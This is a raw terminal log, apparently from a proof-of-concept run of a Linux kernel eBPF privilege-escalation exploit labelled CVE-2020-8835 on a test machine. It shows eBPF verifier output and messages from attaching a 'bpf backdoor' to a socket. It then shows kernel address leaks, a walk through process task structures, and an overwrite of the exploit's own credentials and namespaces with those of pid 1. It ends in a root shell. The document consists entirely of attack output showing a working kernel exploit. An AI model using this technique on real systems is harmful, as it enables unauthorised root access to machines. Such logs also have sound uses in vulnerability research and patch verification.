R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
66: (b7) r0 = 0
67: (95) exit

from 38 to 39 (speculative execution): R0_w=invP0 R6=invP0 R7=invP0 R8_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
39: (b7) r7 = 0
40: (7b) *(u64 *)(r10 -8) = r7
41: (bf) r2 = r10
42: (07) r2 += -8
43: (18) r1 = 0x0
45: (85) call bpf_map_lookup_elem#1
46: safe
processed 72 insns (limit 1000000) max_states_per_insn 0 total_states 6 peak_states 6 mark_read 3

[*] creating socketpair()
[*] attaching bpf backdoor to socket
current pid=950
bpf_arrary_ops=0xffffffff840bcc60
kaslr=0x0
input_map_value_address=0xffff888064704190

tmp_task_address=0xffff88806c950000
tmp_pid=1
good get pid address
pid 1 taskaddress=0xffff88806c950000
pid 1 cred address=0xffff8880696dc600
pid 1 nsproxy address=0xffffffff84adaac0
found pid=2 at 0xffff88806c951740
found pid=3 at 0xffff88806c952e80
found pid=4 at 0xffff88806c9545c0
found pid=5 at 0xffff88806c955d00
found pid=6 at 0xffff88806c998000
found pid=7 at 0xffff88806c999740
found pid=8 at 0xffff88806c99ae80
found pid=9 at 0xffff88806c99c5c0
found pid=10 at 0xffff88806c99dd00
found pid=11 at 0xffff88806c9d0000
found pid=12 at 0xffff88806c9d1740
found pid=13 at 0xffff88806c9d45c0
found pid=14 at 0xffff88806c9d5d00
found pid=15 at 0xffff88806ca08000
found pid=16 at 0xffff88806ca09740
found pid=17 at 0xffff88806ca0ae80
found pid=18 at 0xffff88806ca0c5c0
found pid=19 at 0xffff88806ca0dd00
found pid=20 at 0xffff88806caa0000
found pid=21 at 0xffff88806caa1740
found pid=22 at 0xffff88806caa2e80
found pid=23 at 0xffff88806caa45c0
found pid=24 at 0xffff88806caa5d00
found pid=25 at 0xffff88806c3b8000
found pid=27 at 0xffff88806c3bae80
found pid=71 at 0xffff88806bc90000
found pid=72 at 0xffff88806bc91740
found pid=73 at 0xffff88806bc92e80
found pid=74 at 0xffff88806bc945c0
found pid=75 at 0xffff88806bc95d00
found pid=76 at 0xffff88806ae80000
found pid=77 at 0xffff88806ae81740
found pid=78 at 0xffff88806ae82e80
found pid=79 at 0xffff88806ae845c0
found pid=80 at 0xffff88806ae85d00
found pid=81 at 0xffff88806aa20000
found pid=84 at 0xffff88806aa22e80
found pid=85 at 0xffff88806aa245c0
found pid=86 at 0xffff88806aa25d00
found pid=87 at 0xffff88806a6f0000
found pid=88 at 0xffff88806a6f1740
found pid=89 at 0xffff88806a6f2e80
found pid=90 at 0xffff88806a6f45c0
found pid=91 at 0xffff88806a6f5d00
found pid=92 at 0xffff88806a220000
found pid=93 at 0xffff88806a221740
found pid=99 at 0xffff88806a225d00
found pid=100 at 0xffff888068e40000
found pid=101 at 0xffff888068e41740
found pid=120 at 0xffff8880661d0000
found pid=125 at 0xffff8880662c5d00
found pid=139 at 0xffff88806bc2dd00
found pid=147 at 0xffff88806a2245c0
found pid=151 at 0xffff88806c3ddd00
found pid=194 at 0xffff888066788000
found pid=230 at 0xffff8880662c0000
found pid=236 at 0xffff8880662c1740
found pid=240 at 0xffff888067350000
found pid=243 at 0xffff8880673545c0
found pid=275 at 0xffff888069b8dd00
found pid=330 at 0xffff88806a339740
found pid=331 at 0xffff888065629740
found pid=332 at 0xffff88806a33ae80
found pid=720 at 0xffff888064a49740
found pid=724 at 0xffff888063fa1740
found pid=732 at 0xffff8880699f2e80
found pid=735 at 0xffff8880699f1740
found pid=739 at 0xffff888069ab1740
found pid=745 at 0xffff8880664845c0
found pid=789 at 0xffff888063e31740
found pid=790 at 0xffff888065461740
found pid=950 at 0xffff8880654645c0
found !!!
own_task address at 0xffff8880654645c0
own task cred address at 0xffff888065464c28
own task nsproxy address at 0xffff888065464c88

pid 1 cred usage=1
write cred success
pid 1 nsproxy usage=80
write ns success
got root
root@syzkaller:~/cve-2020-8835# whoami
root
root@syzkaller:~/cve-2020-8835#